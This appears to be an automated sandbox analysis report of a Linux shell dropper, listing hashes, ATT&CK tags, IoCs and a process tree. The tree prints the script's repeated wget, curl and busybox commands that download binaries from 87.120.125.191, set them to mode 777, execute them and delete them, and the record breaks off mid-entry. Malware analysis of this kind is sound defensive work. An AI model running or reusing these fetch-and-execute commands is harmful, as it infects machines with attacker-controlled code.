ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2

Analysis

max time kernel
8s
max time network
129s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
20/11/2024, 03:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2.sh
Size

10KB
MD5

45b72c6c039a3d67373f15957984b0e7
SHA1

8eb92a8fd6c526682b007d3c8fd7906f1516c6ae
SHA256

ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2
SHA512

d8608a7803cb7783e729069dd99b25a75e4a730d130b624f1cf604a17ac9d1fe65fd00563d154b9c02e552d8c8324832be6cebbbd8c9eb96f4a92cf3959dfd50
SSDEEP

192:mN1RZ53Z5G7VlVNVYTn177f0adFIG6PrPU7FtTlMc2McqMcycXcHcuPbj9lx7x4M:BScGbEdG2d+SXBG2d+S3Z

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1512	chmod
1525	chmod
1628	chmod
1664	chmod
1537	chmod
1549	chmod
1579	chmod
1634	chmod
1555	chmod
1561	chmod
1640	chmod
1658	chmod
1543	chmod
1567	chmod
1573	chmod
1591	chmod
1506	chmod
1531	chmod
1622	chmod
1646	chmod
1597	chmod
1610	chmod
1518	chmod
1585	chmod
1616	chmod
1603	chmod
1652	chmod
1670	chmod

Executes dropped EXE 28 IoCs

System Network Configuration Discovery 1 TTPs 10 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1653	8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
1576	wget
1578	busybox
1580	8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
1650	curl
1654	rm
1577	curl
1581	rm
1649	wget
1651	busybox

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia	curl
File opened for modification	/tmp/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr	curl
File opened for modification	/tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg	curl
File opened for modification	/tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG	curl
File opened for modification	/tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia	curl
File opened for modification	/tmp/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu	curl
File opened for modification	/tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG	curl
File opened for modification	/tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG	curl
File opened for modification	/tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx	curl
File opened for modification	/tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq	curl
File opened for modification	/tmp/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr	curl
File opened for modification	/tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq	curl
File opened for modification	/tmp/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9	curl
File opened for modification	/tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f	curl
File opened for modification	/tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG	curl
File opened for modification	/tmp/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9	curl
File opened for modification	/tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C	curl
File opened for modification	/tmp/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN	curl
File opened for modification	/tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm	curl
File opened for modification	/tmp/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN	curl
File opened for modification	/tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR	curl
File opened for modification	/tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C	curl
File opened for modification	/tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR	curl
File opened for modification	/tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f	curl
File opened for modification	/tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx	curl
File opened for modification	/tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm	curl
File opened for modification	/tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg	curl
File opened for modification	/tmp/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu	curl

/tmp/ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2.sh
/tmp/ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2.sh
1⤵
PID:1498
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:1499
- /usr/bin/wget
  wget http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  PID:1500
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  - Writes file to tmp directory
  PID:1501
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  PID:1505
- /bin/chmod
  chmod 777 HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  - File and Directory Permissions Modification
  PID:1506
- /tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  ./HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  - Executes dropped EXE
  PID:1507
- /bin/rm
  rm HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  PID:1508
- /usr/bin/wget
  wget http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  PID:1509
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  - Writes file to tmp directory
  PID:1510
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  PID:1511
- /bin/chmod
  chmod 777 EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  - File and Directory Permissions Modification
  PID:1512
- /tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  ./EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  - Executes dropped EXE
  PID:1513
- /bin/rm
  rm EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  PID:1514
- /usr/bin/wget
  wget http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  PID:1515
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  - Writes file to tmp directory
  PID:1516
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  PID:1517
- /bin/chmod
  chmod 777 UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  - File and Directory Permissions Modification
  PID:1518
- /tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  ./UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  - Executes dropped EXE
  PID:1519
- /bin/rm
  rm UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  PID:1521
- /usr/bin/wget
  wget http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  PID:1522
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  - Writes file to tmp directory
  PID:1523
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  PID:1524
- /bin/chmod
  chmod 777 2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  - File and Directory Permissions Modification
  PID:1525
- /tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  ./2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  - Executes dropped EXE
  PID:1526
- /bin/rm
  rm 2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  PID:1527
- /usr/bin/wget
  wget http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  PID:1528
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  - Writes file to tmp directory
  PID:1529
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  PID:1530
- /bin/chmod
  chmod 777 urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  - File and Directory Permissions Modification
  PID:1531
- /tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  ./urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  - Executes dropped EXE
  PID:1532
- /bin/rm
  rm urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  PID:1533
- /usr/bin/wget
  wget http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  PID:1534
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  - Writes file to tmp directory
  PID:1535
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  PID:1536
- /bin/chmod
  chmod 777 A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  - File and Directory Permissions Modification
  PID:1537
- /tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  ./A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  - Executes dropped EXE
  PID:1538
- /bin/rm
  rm A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  PID:1539
- /usr/bin/wget
  wget http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  PID:1540
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  - Writes file to tmp directory
  PID:1541
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  PID:1542
- /bin/chmod
  chmod 777 I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  - File and Directory Permissions Modification
  PID:1543
- /tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  ./I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  - Executes dropped EXE
  PID:1544
- /bin/rm
  rm I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  PID:1545
- /usr/bin/wget
  wget http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  PID:1546
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  - Writes file to tmp directory
  PID:1547
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  PID:1548
- /bin/chmod
  chmod 777 DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  - File and Directory Permissions Modification
  PID:1549
- /tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  ./DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  - Executes dropped EXE
  PID:1550
- /bin/rm
  rm DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  PID:1551
- /usr/bin/wget
  wget http://87.120.125.191/bins/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  PID:1552
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  - Writes file to tmp directory
  PID:1553
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  PID:1554
- /bin/chmod
  chmod 777 NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  - File and Directory Permissions Modification
  PID:1555
- /tmp/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  ./NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  - Executes dropped EXE
  PID:1556
- /bin/rm
  rm NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  PID:1557
- /usr/bin/wget
  wget http://87.120.125.191/bins/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  PID:1558
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  - Writes file to tmp directory
  PID:1559
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  PID:1560
- /bin/chmod
  chmod 777 FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  - File and Directory Permissions Modification
  PID:1561
- /tmp/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  ./FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  - Executes dropped EXE
  PID:1562
- /bin/rm
  rm FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  PID:1563
- /usr/bin/wget
  wget http://87.120.125.191/bins/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  PID:1564
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  - Writes file to tmp directory
  PID:1565
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  PID:1566
- /bin/chmod
  chmod 777 c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  - File and Directory Permissions Modification
  PID:1567
- /tmp/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  ./c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  - Executes dropped EXE
  PID:1568
- /bin/rm
  rm c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  PID:1569
- /usr/bin/wget
  wget http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  PID:1570
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  - Writes file to tmp directory
  PID:1571
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  PID:1572
- /bin/chmod
  chmod 777 GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  - File and Directory Permissions Modification
  PID:1573
- /tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  ./GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  - Executes dropped EXE
  PID:1574
- /bin/rm
  rm GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  PID:1575
- /usr/bin/wget
  wget http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - System Network Configuration Discovery
  PID:1576
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1577
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - System Network Configuration Discovery
  PID:1578
- /bin/chmod
  chmod 777 8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - File and Directory Permissions Modification
  PID:1579
- /tmp/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  ./8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:1580
- /bin/rm
  rm 8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - System Network Configuration Discovery
  PID:1581
- /usr/bin/wget
  wget http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  PID:1582
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  - Writes file to tmp directory
  PID:1583
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  PID:1584
- /bin/chmod
  chmod 777 HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  - File and Directory Permissions Modification
  PID:1585
- /tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  ./HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  - Executes dropped EXE
  PID:1586
- /bin/rm
  rm HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  PID:1587
- /usr/bin/wget
  wget http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  PID:1588
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  - Writes file to tmp directory
  PID:1589
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  PID:1590
- /bin/chmod
  chmod 777 HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  - File and Directory Permissions Modification
  PID:1591
- /tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  ./HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  - Executes dropped EXE
  PID:1592
- /bin/rm
  rm HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  PID:1593
- /usr/bin/wget
  wget http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  PID:1594
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  - Writes file to tmp directory
  PID:1595
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  PID:1596
- /bin/chmod
  chmod 777 EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  - File and Directory Permissions Modification
  PID:1597
- /tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  ./EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  - Executes dropped EXE
  PID:1598
- /bin/rm
  rm EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  PID:1599
- /usr/bin/wget
  wget http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  PID:1600
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  - Writes file to tmp directory
  PID:1601
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  PID:1602
- /bin/chmod
  chmod 777 UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  - File and Directory Permissions Modification
  PID:1603
- /tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  ./UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  - Executes dropped EXE
  PID:1604
- /bin/rm
  rm UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  PID:1606
- /usr/bin/wget
  wget http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  PID:1607
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  - Writes file to tmp directory
  PID:1608
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  PID:1609
- /bin/chmod
  chmod 777 HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  - File and Directory Permissions Modification
  PID:1610
- /tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  ./HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  - Executes dropped EXE
  PID:1611
- /bin/rm
  rm HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  PID:1612
- /usr/bin/wget
  wget http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  PID:1613
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  - Writes file to tmp directory
  PID:1614
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  PID:1615
- /bin/chmod
  chmod 777 I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  - File and Directory Permissions Modification
  PID:1616
- /tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  ./I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  - Executes dropped EXE
  PID:1617
- /bin/rm
  rm I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  PID:1618
- /usr/bin/wget
  wget http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  PID:1619
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  - Writes file to tmp directory
  PID:1620
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  PID:1621
- /bin/chmod
  chmod 777 DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  - File and Directory Permissions Modification
  PID:1622
- /tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  ./DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  - Executes dropped EXE
  PID:1623
- /bin/rm
  rm DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  PID:1624
- /usr/bin/wget
  wget http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  PID:1625
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  - Writes file to tmp directory
  PID:1626
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  PID:1627
- /bin/chmod
  chmod 777 2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  - File and Directory Permissions Modification
  PID:1628
- /tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  ./2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  - Executes dropped EXE
  PID:1629
- /bin/rm
  rm 2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  PID:1630
- /usr/bin/wget
  wget http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  PID:1631
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  - Writes file to tmp directory
  PID:1632
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  PID:1633
- /bin/chmod
  chmod 777 urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  - File and Directory Permissions Modification
  PID:1634
- /tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  ./urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  - Executes dropped EXE
  PID:1635
- /bin/rm
  rm urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  PID:1636
- /usr/bin/wget
  wget http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  PID:1637
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  - Writes file to tmp directory
  PID:1638
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  PID:1639
- /bin/chmod
  chmod 777 A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  - File and Directory Permissions Modification
  PID:1640
- /tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  ./A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  - Executes dropped EXE
  PID:1641
- /bin/rm
  rm A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  PID:1642
- /usr/bin/wget
  wget http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  PID:1643
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  - Writes file to tmp directory
  PID:1644
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  PID:1645
- /bin/chmod
  chmod 777 GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  - File and Directory Permissions Modification
  PID:1646
- /tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  ./GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  - Executes dropped EXE
  PID:1647
- /bin/rm
  rm GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  PID:1648
- /usr/bin/wget
  wget http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - System Network Configuration Discovery
  PID:1649
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1650
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - System Network Configuration Discovery
  PID:1651
- /bin/chmod
  chmod 777 8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - File and Directory Permissions Modification
  PID:1652
- /tmp/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  ./8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:1653
- /bin/rm
  rm 8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - System Network Configuration Discovery
  PID:1654
- /usr/bin/wget
  wget http://87.120.125.191/bins/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  PID:1655
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  - Writes file to tmp directory
  PID:1656
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  PID:1657
- /bin/chmod
  chmod 777 NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  - File and Directory Permissions Modification
  PID:1658
- /tmp/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
